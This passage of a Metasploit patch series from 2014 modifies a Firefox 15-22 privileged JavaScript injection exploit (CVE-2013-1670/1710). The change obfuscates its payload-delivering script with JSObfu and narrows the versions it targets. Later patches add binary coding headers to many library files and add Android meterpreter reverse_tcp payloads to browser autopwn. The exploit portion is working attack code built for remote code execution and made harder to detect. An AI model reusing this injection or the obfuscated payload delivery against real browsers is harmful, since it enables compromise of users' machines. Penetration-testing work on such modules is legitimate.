-      :payload => run_payload # defined in FirefoxPrivilegeEscalation mixin
-    }
+    key = Rex::Text.rand_text_alpha(5 + rand(12))
+    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+    js = Rex::Exploitation::JSObfu.new(%Q|
+      var opts = #{JSON.unparse(opts)};
+      var key = opts['#{key}'];
+      var y = {}, q = false;
+      y.constructor.prototype.toString=function() {
+        if (q) return;
+        q = true;
+        crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");
+        return 5;
+      };
+      console.time(y);
+    |)
+
+    js.obfuscate
 
     %Q|
-       <!doctype html>
-       <html>
-         <body>
-           <script>
-             var opts = #{JSON.unparse(opts)};
-             var y = {};
-             y.constructor.prototype.toString=function() {
-               if (window.q) return;
-               window.q = true;
-               crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
-               return 5;
-             };
-             console.time(y);
-           </script>
-           #{datastore['CONTENT']}
-         </body>
-       </html>
+      <!doctype html>
+      <html>
+        <body>
+          <script>
+            #{js}
+          </script>
+          #{datastore['CONTENT']}
+        </body>
+      </html>
     |
   end
 end

From 6d958475d62cd23785dcd612b31d66ccf3fded84 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 17:00:58 -0500
Subject: [PATCH 317/321] Oops, this doesn't work on 23, only 22.

---
 .../browser/firefox_tostring_console_injection.rb    | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index 98fef07156..a8d467dcf5 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
   autopwn_info({
     :ua_name    => HttpClients::FF,
     :ua_minver  => "15.0",
-    :ua_maxver  => "23.0",
+    :ua_maxver  => "22.0",
     :javascript => true,
     :rank       => ExcellentRanking
   })
@@ -25,18 +25,20 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
       'Description'    => %q{
-        This exploit gains remote code execution on Firefox 15-23 by abusing two separate
+        This exploit gains remote code execution on Firefox 15-22 by abusing two separate
         Javascript-related vulnerabilities to ultimately inject malicious Javascript code
         into a context running with chrome:// privileges.
       },
       'License' => MSF_LICENSE,
       'Author'  => [
         'moz_bug_r_a4', # discovered CVE-2013-1710
+        'Cody Crews',   # discovered CVE-2013-1670
         'joev' # metasploit module
       ],
-      'DisclosureDate' => "Aug 6 2013",
+      'DisclosureDate' => "May 14 2013",
       'References' => [
-        ['CVE', '2013-1710']   # bypass Chrome Object Wrapper to talk to chrome://
+        ['CVE', '2013-1670'], # privileged access for content-level constructor
+        ['CVE', '2013-1710']  # further chrome injection
       ],
       'Targets' => [
         [
@@ -56,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' => {
         :source  => 'script',
         :ua_name => HttpClients::FF,
-        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 23) }
+        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 22) }
       }
     ))
 

From 5e123e024d42bcf6e341e319752d37c0613a8931 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 17 Aug 2014 17:31:53 -0500
Subject: [PATCH 318/321] Add 'coding: binary' to all msf/rex library files

This fixes a huge number of hard-to-detect runtime bugs
that occur when a default utf-8 string from one of these
libraries is passed into a method expecting ascii-8bit
---
 lib/msf/base/simple/framework/module_paths.rb                | 1 +
 lib/msf/core/auxiliary/web/analysis/differential.rb          | 1 +
 lib/msf/core/auxiliary/web/analysis/taint.rb                 | 1 +
 lib/msf/core/auxiliary/web/analysis/timing.rb                | 1 +
 lib/msf/core/auxiliary/web/form.rb                           | 1 +
 lib/msf/core/auxiliary/web/fuzzable.rb                       | 1 +
 lib/msf/core/auxiliary/web/http.rb                           | 1 +
 lib/msf/core/auxiliary/web/path.rb                           | 1 +
 lib/msf/core/auxiliary/web/target.rb                         | 1 +
 lib/msf/core/db_manager/import_msf_xml.rb                    | 1 +
 lib/msf/core/db_manager/migration.rb                         | 1 +
 lib/msf/core/exe/segment_injector.rb                         | 1 +
 lib/msf/core/exploit/local/compile_c.rb                      | 1 +
 lib/msf/core/exploit/local/linux.rb                          | 1 +
 lib/msf/core/exploit/local/linux_kernel.rb                   | 1 +
 lib/msf/core/exploit/postgres.rb                             | 1 +
 lib/msf/core/handler/reverse_http/uri_checksum.rb            | 1 +
 lib/msf/core/handler/reverse_tcp_ssl.rb                      | 1 +
 lib/msf/core/module/deprecated.rb                            | 1 +
 lib/msf/core/module_manager/cache.rb                         | 1 +
 lib/msf/core/module_manager/loading.rb                       | 1 +
 lib/msf/core/module_manager/module_paths.rb                  | 1 +
 lib/msf/core/module_manager/module_sets.rb                   | 1 +
 lib/msf/core/module_manager/reloading.rb                     | 1 +
 lib/msf/core/modules.rb                                      | 1 +
 lib/msf/core/modules/error.rb                                | 1 +
 lib/msf/core/modules/loader.rb                               | 1 +
 lib/msf/core/modules/loader/archive.rb                       | 1 +
 lib/msf/core/modules/loader/base.rb                          | 1 +
 lib/msf/core/modules/loader/directory.rb                     | 1 +
 lib/msf/core/modules/metasploit_class_compatibility_error.rb | 1 +
 lib/msf/core/modules/namespace.rb                            | 1 +
 lib/msf/core/modules/version_compatibility_error.rb          | 1 +
 lib/msf/core/payload/windows/prepend_migrate.rb              | 1 +
 lib/msf/core/payload_generator.rb                            | 1 +
 lib/msf/core/post/linux.rb                                   | 1 +
 lib/msf/core/post/osx.rb                                     | 1 +
 lib/msf/core/post/osx/ruby_dl.rb                             | 1 +
 lib/msf/core/post/solaris.rb                                 | 1 +
 lib/msf/core/post/windows.rb                                 | 1 +
 lib/msf/core/post/windows/error.rb                           | 1 +
 lib/msf/ui/logos/test.rb                                     | 1 +
 lib/rex/encoder/bloxor/bloxor.rb                             | 1 +
 lib/rex/exploitation/ropdb.rb                                | 1 +
 lib/rex/mac_oui.rb                                           | 1 +
 lib/rex/parser/outpost24_nokogiri.rb                         | 1 +
 lib/rex/poly/machine.rb                                      | 1 +
 lib/rex/poly/machine/machine.rb                              | 1 +
 lib/rex/poly/machine/x86.rb                                  | 1 +
 lib/rex/proto/ipmi/channel_auth_reply.rb                     | 1 +
 lib/rex/proto/ipmi/open_session_reply.rb                     | 1 +
 lib/rex/proto/ipmi/rakp2.rb                                  | 1 +
 lib/rex/proto/pjl.rb                                         | 1 +
 lib/rex/proto/pjl/client.rb                                  | 1 +
 lib/rex/random_identifier_generator.rb                       | 1 +
 lib/rex/sslscan/result.rb                                    | 1 +
 lib/rex/sslscan/scanner.rb                                   | 1 +
 lib/rex/ui/text/output/buffer/stdout.rb                      | 1 +
 58 files changed, 58 insertions(+)

diff --git a/lib/msf/base/simple/framework/module_paths.rb b/lib/msf/base/simple/framework/module_paths.rb
index e0977be756..a5ddf83840 100644
--- a/lib/msf/base/simple/framework/module_paths.rb
+++ b/lib/msf/base/simple/framework/module_paths.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
   module Simple
     module Framework
diff --git a/lib/msf/core/auxiliary/web/analysis/differential.rb b/lib/msf/core/auxiliary/web/analysis/differential.rb
index 1bbe5cd809..0a5fbaa2a2 100644
--- a/lib/msf/core/auxiliary/web/analysis/differential.rb
+++ b/lib/msf/core/auxiliary/web/analysis/differential.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/lib/msf/core/auxiliary/web/analysis/taint.rb b/lib/msf/core/auxiliary/web/analysis/taint.rb
index e513d34da7..1be14dbd85 100644
--- a/lib/msf/core/auxiliary/web/analysis/taint.rb
+++ b/lib/msf/core/auxiliary/web/analysis/taint.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/lib/msf/core/auxiliary/web/analysis/timing.rb b/lib/msf/core/auxiliary/web/analysis/timing.rb
index d307d2db83..ed0dc6042a 100644
--- a/lib/msf/core/auxiliary/web/analysis/timing.rb
+++ b/lib/msf/core/auxiliary/web/analysis/timing.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/lib/msf/core/auxiliary/web/form.rb b/lib/msf/core/auxiliary/web/form.rb
index 6dbc16dbf0..130b0fe0b3 100644
--- a/lib/msf/core/auxiliary/web/form.rb
+++ b/lib/msf/core/auxiliary/web/form.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
diff --git a/lib/msf/core/auxiliary/web/fuzzable.rb b/lib/msf/core/auxiliary/web/fuzzable.rb
index c98176f62c..07ae5ae284 100644
--- a/lib/msf/core/auxiliary/web/fuzzable.rb
+++ b/lib/msf/core/auxiliary/web/fuzzable.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb
index 495180f67c..45c91883ce 100644
--- a/lib/msf/core/auxiliary/web/http.rb
+++ b/lib/msf/core/auxiliary/web/http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
diff --git a/lib/msf/core/auxiliary/web/path.rb b/lib/msf/core/auxiliary/web/path.rb
index 889e72e38b..07ab99694e 100644
--- a/lib/msf/core/auxiliary/web/path.rb
+++ b/lib/msf/core/auxiliary/web/path.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
diff --git a/lib/msf/core/auxiliary/web/target.rb b/lib/msf/core/auxiliary/web/target.rb
index b606ab0b4f..fd4fc593ff 100644
--- a/lib/msf/core/auxiliary/web/target.rb
+++ b/lib/msf/core/auxiliary/web/target.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
diff --git a/lib/msf/core/db_manager/import_msf_xml.rb b/lib/msf/core/db_manager/import_msf_xml.rb
index 68e712468d..e3ffd53734 100644
--- a/lib/msf/core/db_manager/import_msf_xml.rb
+++ b/lib/msf/core/db_manager/import_msf_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
   class DBManager
     # Handles importing of the xml format exported by Pro.  The methods are in a
diff --git a/lib/msf/core/db_manager/migration.rb b/lib/msf/core/db_manager/migration.rb
index 6d8974b1ac..26c90c6920 100644
--- a/lib/msf/core/db_manager/migration.rb
+++ b/lib/msf/core/db_manager/migration.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
   class DBManager
     module Migration
diff --git a/lib/msf/core/exe/segment_injector.rb b/lib/msf/core/exe/segment_injector.rb
index 829ed71cdf..418e2959b5 100644
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
 module Exe
 
diff --git a/lib/msf/core/exploit/local/compile_c.rb b/lib/msf/core/exploit/local/compile_c.rb
index 4e892b6ad9..8c0ad3e74e 100644
--- a/lib/msf/core/exploit/local/compile_c.rb
+++ b/lib/msf/core/exploit/local/compile_c.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Msf
 module Exploit::Local::CompileC
diff --git a/lib/msf/core/exploit/local/linux.rb b/lib/msf/core/exploit/local/linux.rb
index 5a05f5f379..b79c18f5d9 100644
--- a/lib/msf/core/exploit/local/linux.rb
+++ b/lib/msf/core/exploit/local/linux.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core/exploit/local/compile_c'
 
 module Msf
diff --git a/lib/msf/core/exploit/local/linux_kernel.rb b/lib/msf/core/exploit/local/linux_kernel.rb
index 72a81eb6a8..4765a3409d 100644
--- a/lib/msf/core/exploit/local/linux_kernel.rb
+++ b/lib/msf/core/exploit/local/linux_kernel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core/exploit/local/compile_c'
 
 module Msf
diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb
index 2bc60e7282..514eae6c50 100644
--- a/lib/msf/core/exploit/postgres.rb
+++ b/lib/msf/core/exploit/postgres.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core'
 
 module Msf
diff --git a/lib/msf/core/handler/reverse_http/uri_checksum.rb b/lib/msf/core/handler/reverse_http/uri_checksum.rb
index e89c753dcf..cbb9ca0a76 100644
--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
   module Handler
     module ReverseHttp
diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb
index e469054d65..11ddd4c575 100644
--- a/lib/msf/core/handler/reverse_tcp_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_ssl.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'rex/socket'
 require 'thread'
 
diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb
index dea8f15d52..2879223d2f 100644
--- a/lib/msf/core/module/deprecated.rb
+++ b/lib/msf/core/module/deprecated.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Msf::Module::Deprecated
 
diff --git a/lib/msf/core/module_manager/cache.rb b/lib/msf/core/module_manager/cache.rb
index a61aa7606a..a1f626a5a6 100644
--- a/lib/msf/core/module_manager/cache.rb
+++ b/lib/msf/core/module_manager/cache.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 #
 # Gems
 #
diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb
index e346527d2d..5418e7a2f2 100644
--- a/lib/msf/core/module_manager/loading.rb
+++ b/lib/msf/core/module_manager/loading.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 #
 # Gems
 #
diff --git a/lib/msf/core/module_manager/module_paths.rb b/lib/msf/core/module_manager/module_paths.rb
index ede9a84889..1a23ed2889 100644
--- a/lib/msf/core/module_manager/module_paths.rb
+++ b/lib/msf/core/module_manager/module_paths.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 #
 # Gems
 #
diff --git a/lib/msf/core/module_manager/module_sets.rb b/lib/msf/core/module_manager/module_sets.rb
index f51727fe2d..7af1a14a5a 100644
--- a/lib/msf/core/module_manager/module_sets.rb
+++ b/lib/msf/core/module_manager/module_sets.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 #
 # Gems
 #
diff --git a/lib/msf/core/module_manager/reloading.rb b/lib/msf/core/module_manager/reloading.rb
index 0e3bf6d5fa..e864ba5497 100644
--- a/lib/msf/core/module_manager/reloading.rb
+++ b/lib/msf/core/module_manager/reloading.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # Concerns reloading modules
 module Msf::ModuleManager::Reloading
   # Reloads the module specified in mod.  This can either be an instance of a module or a module class.
diff --git a/lib/msf/core/modules.rb b/lib/msf/core/modules.rb
index 74b3722df3..c8114b24cf 100644
--- a/lib/msf/core/modules.rb
+++ b/lib/msf/core/modules.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # Namespace for loading Metasploit modules
 module Msf::Modules
 
diff --git a/lib/msf/core/modules/error.rb b/lib/msf/core/modules/error.rb
index 463a1e98ac..106fdf5467 100644
--- a/lib/msf/core/modules/error.rb
+++ b/lib/msf/core/modules/error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # Base error class for all error under {Msf::Modules}
 class Msf::Modules::Error < StandardError
   def initialize(attributes={})
diff --git a/lib/msf/core/modules/loader.rb b/lib/msf/core/modules/loader.rb
index e85040ea16..793eede152 100644
--- a/lib/msf/core/modules/loader.rb
+++ b/lib/msf/core/modules/loader.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core/modules'
 
 # Namespace for module loaders
diff --git a/lib/msf/core/modules/loader/archive.rb b/lib/msf/core/modules/loader/archive.rb
index 338dec039a..9aaf180e23 100644
--- a/lib/msf/core/modules/loader/archive.rb
+++ b/lib/msf/core/modules/loader/archive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core/modules/loader/base'
 
 # Concerns loading modules form fastlib archives
diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb
index 0771d4f822..88317395f5 100644
--- a/lib/msf/core/modules/loader/base.rb
+++ b/lib/msf/core/modules/loader/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 #
 # Project
 #
diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb
index 0b61a1b02d..2470fcf712 100644
--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # Concerns loading module from a directory
 class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
   # Returns true if the path is a directory
diff --git a/lib/msf/core/modules/metasploit_class_compatibility_error.rb b/lib/msf/core/modules/metasploit_class_compatibility_error.rb
index 1bdc67c3d2..ae829392cf 100644
--- a/lib/msf/core/modules/metasploit_class_compatibility_error.rb
+++ b/lib/msf/core/modules/metasploit_class_compatibility_error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core/modules/error'
 
 # Error raised by {Msf::Modules::Namespace#metasploit_class!} if it cannot the namespace_module does not have a constant
diff --git a/lib/msf/core/modules/namespace.rb b/lib/msf/core/modules/namespace.rb
index 4eb60c3e52..fa65f5fa26 100644
--- a/lib/msf/core/modules/namespace.rb
+++ b/lib/msf/core/modules/namespace.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'metasploit/framework/api/version'
 require 'metasploit/framework/core/version'
 
diff --git a/lib/msf/core/modules/version_compatibility_error.rb b/lib/msf/core/modules/version_compatibility_error.rb
index 7d622d1f95..fb52be3fc8 100644
--- a/lib/msf/core/modules/version_compatibility_error.rb
+++ b/lib/msf/core/modules/version_compatibility_error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core/modules/error'
 
 # Error raised by {Msf::Modules::Namespace#version_compatible!} on {Msf::Modules::Loader::Base#create_namespace_module}
diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb
index 356d12ce59..122a5f28ff 100644
--- a/lib/msf/core/payload/windows/prepend_migrate.rb
+++ b/lib/msf/core/payload/windows/prepend_migrate.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'msf/core'
 
 ###
diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index d1be51b7af..7a0358a7a7 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'active_support/core_ext/numeric/bytes'
 module Msf
 
diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb
index a42dd1056e..b056fff87c 100644
--- a/lib/msf/core/post/linux.rb
+++ b/lib/msf/core/post/linux.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf::Post::Linux
   require 'msf/core/post/linux/priv'
   require 'msf/core/post/linux/system'
diff --git a/lib/msf/core/post/osx.rb b/lib/msf/core/post/osx.rb
index 0227f44dbb..e7bd3e59e2 100644
--- a/lib/msf/core/post/osx.rb
+++ b/lib/msf/core/post/osx.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Msf::Post::OSX
   require 'msf/core/post/osx/system'
diff --git a/lib/msf/core/post/osx/ruby_dl.rb b/lib/msf/core/post/osx/ruby_dl.rb
index 87f30e38a0..7b52a52c16 100644
--- a/lib/msf/core/post/osx/ruby_dl.rb
+++ b/lib/msf/core/post/osx/ruby_dl.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
 class Post
 module OSX
diff --git a/lib/msf/core/post/solaris.rb b/lib/msf/core/post/solaris.rb
index 015fd29470..42620e9a21 100644
--- a/lib/msf/core/post/solaris.rb
+++ b/lib/msf/core/post/solaris.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf::Post::Solaris
   require 'msf/core/post/solaris/priv'
   require 'msf/core/post/solaris/system'
diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb
index 089fba3aea..4d41dbcbe3 100644
--- a/lib/msf/core/post/windows.rb
+++ b/lib/msf/core/post/windows.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Msf::Post::Windows
   require 'msf/core/post/windows/error'
diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb
index cd650c5f58..a9764c32ab 100644
--- a/lib/msf/core/post/windows/error.rb
+++ b/lib/msf/core/post/windows/error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Msf::Post::Windows::Error
   SUCCESS = 0x0000
diff --git a/lib/msf/ui/logos/test.rb b/lib/msf/ui/logos/test.rb
index 2a8e063414..5a30e29eb1 100644
--- a/lib/msf/ui/logos/test.rb
+++ b/lib/msf/ui/logos/test.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 here = File.expand_path(File.dirname(__FILE__))
 
diff --git a/lib/rex/encoder/bloxor/bloxor.rb b/lib/rex/encoder/bloxor/bloxor.rb
index 26c801d665..c16db29338 100644
--- a/lib/rex/encoder/bloxor/bloxor.rb
+++ b/lib/rex/encoder/bloxor/bloxor.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 require 'rex/poly/machine'
 
diff --git a/lib/rex/exploitation/ropdb.rb b/lib/rex/exploitation/ropdb.rb
index c97091f88c..c035a1f18a 100644
--- a/lib/rex/exploitation/ropdb.rb
+++ b/lib/rex/exploitation/ropdb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'rex/text'
 require 'rexml/document'
 
diff --git a/lib/rex/mac_oui.rb b/lib/rex/mac_oui.rb
index 3f5046557f..4d47e29ba3 100644
--- a/lib/rex/mac_oui.rb
+++ b/lib/rex/mac_oui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 module Oui
diff --git a/lib/rex/parser/outpost24_nokogiri.rb b/lib/rex/parser/outpost24_nokogiri.rb
index a925afdf70..2d612ae971 100644
--- a/lib/rex/parser/outpost24_nokogiri.rb
+++ b/lib/rex/parser/outpost24_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require "rex/parser/nokogiri_doc_mixin"
 
 module Rex
diff --git a/lib/rex/poly/machine.rb b/lib/rex/poly/machine.rb
index b530268164..152dfb4e69 100644
--- a/lib/rex/poly/machine.rb
+++ b/lib/rex/poly/machine.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 
diff --git a/lib/rex/poly/machine/machine.rb b/lib/rex/poly/machine/machine.rb
index 107a838acc..021effa940 100644
--- a/lib/rex/poly/machine/machine.rb
+++ b/lib/rex/poly/machine/machine.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 
diff --git a/lib/rex/poly/machine/x86.rb b/lib/rex/poly/machine/x86.rb
index f2fc3131b2..cedc8cd148 100644
--- a/lib/rex/poly/machine/x86.rb
+++ b/lib/rex/poly/machine/x86.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 
diff --git a/lib/rex/proto/ipmi/channel_auth_reply.rb b/lib/rex/proto/ipmi/channel_auth_reply.rb
index 8368fa494a..b2beb45dcc 100644
--- a/lib/rex/proto/ipmi/channel_auth_reply.rb
+++ b/lib/rex/proto/ipmi/channel_auth_reply.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 module Proto
diff --git a/lib/rex/proto/ipmi/open_session_reply.rb b/lib/rex/proto/ipmi/open_session_reply.rb
index 8c6884c825..7add8e356c 100644
--- a/lib/rex/proto/ipmi/open_session_reply.rb
+++ b/lib/rex/proto/ipmi/open_session_reply.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 module Proto
diff --git a/lib/rex/proto/ipmi/rakp2.rb b/lib/rex/proto/ipmi/rakp2.rb
index 2a633abc6f..fb28f06333 100644
--- a/lib/rex/proto/ipmi/rakp2.rb
+++ b/lib/rex/proto/ipmi/rakp2.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 module Rex
 module Proto
diff --git a/lib/rex/proto/pjl.rb b/lib/rex/proto/pjl.rb
index 5b771e8417..172cb42dca 100644
--- a/lib/rex/proto/pjl.rb
+++ b/lib/rex/proto/pjl.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # https://en.wikipedia.org/wiki/Printer_Job_Language
 # See external links for PJL spec
 
diff --git a/lib/rex/proto/pjl/client.rb b/lib/rex/proto/pjl/client.rb
index 0a85245af2..268a0768ef 100644
--- a/lib/rex/proto/pjl/client.rb
+++ b/lib/rex/proto/pjl/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # https://en.wikipedia.org/wiki/Printer_Job_Language
 # See external links for PJL spec
 
diff --git a/lib/rex/random_identifier_generator.rb b/lib/rex/random_identifier_generator.rb
index ab84faf3bc..6f6703951a 100644
--- a/lib/rex/random_identifier_generator.rb
+++ b/lib/rex/random_identifier_generator.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 # A quick way to produce unique random strings that follow the rules of
 # identifiers, i.e., begin with a letter and contain only alphanumeric
diff --git a/lib/rex/sslscan/result.rb b/lib/rex/sslscan/result.rb
index efcd999e35..01f6052c26 100644
--- a/lib/rex/sslscan/result.rb
+++ b/lib/rex/sslscan/result.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 
 require 'rex/socket'
 require 'rex/ui/text/table'
diff --git a/lib/rex/sslscan/scanner.rb b/lib/rex/sslscan/scanner.rb
index 17579cf2f3..4b56b509dd 100644
--- a/lib/rex/sslscan/scanner.rb
+++ b/lib/rex/sslscan/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 require 'rex/socket'
 require 'rex/sslscan/result'
 
diff --git a/lib/rex/ui/text/output/buffer/stdout.rb b/lib/rex/ui/text/output/buffer/stdout.rb
index fedf555233..c8a7a5357a 100644
--- a/lib/rex/ui/text/output/buffer/stdout.rb
+++ b/lib/rex/ui/text/output/buffer/stdout.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # make sure the classes are defined before opening it to define submodule
 require 'rex/ui/text/output'
 require 'rex/ui/text/output/buffer'

From 5bfbb7654ee6935afcaa4a0e3d979939f85a42e5 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Mon, 18 Aug 2014 11:09:16 -0500
Subject: [PATCH 319/321] Add android meterpreter to browser autopwn.

---
 modules/auxiliary/server/browser_autopwn.rb | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb
index 8bbdeda05b..bcce9e65b4 100644
--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -114,6 +114,13 @@ class Metasploit3 < Msf::Auxiliary
         'The payload to use for Java reverse-connect payloads',
         'java/meterpreter/reverse_tcp'
       ]),
+      OptPort.new('LPORT_ANDROID', [false,
+        'The port to use for Java reverse-connect payloads', 8888
+      ]),
+      OptString.new('PAYLOAD_ANDROID', [false,
+        'The payload to use for Android reverse-connect payloads',
+        'android/meterpreter/reverse_tcp'
+      ])
     ], self.class)
 
     @exploits = Hash.new
@@ -265,6 +272,8 @@ class Metasploit3 < Msf::Auxiliary
     @gen_payload  = datastore['PAYLOAD_GENERIC']
     @java_lport = datastore['LPORT_JAVA']
     @java_payload = datastore['PAYLOAD_JAVA']
+    @android_lport = datastore['LPORT_ANDROID']
+    @android_payload = datastore['PAYLOAD_ANDROID']
 
     minrank = framework.datastore['MinimumRank'] || 'manual'
     if not RankingName.values.include?(minrank)
@@ -320,6 +329,9 @@ class Metasploit3 < Msf::Auxiliary
     when %r{/java_}
       payload = @java_payload
       lport = @java_lport
+    when %r{^android/}
+      payload = @android_payload
+      lport = @android_lport
     else
       payload = @gen_payload
       lport = @gen_lport

From b9e449f5e27544e55a45b011c6c5d445a1fe986f Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
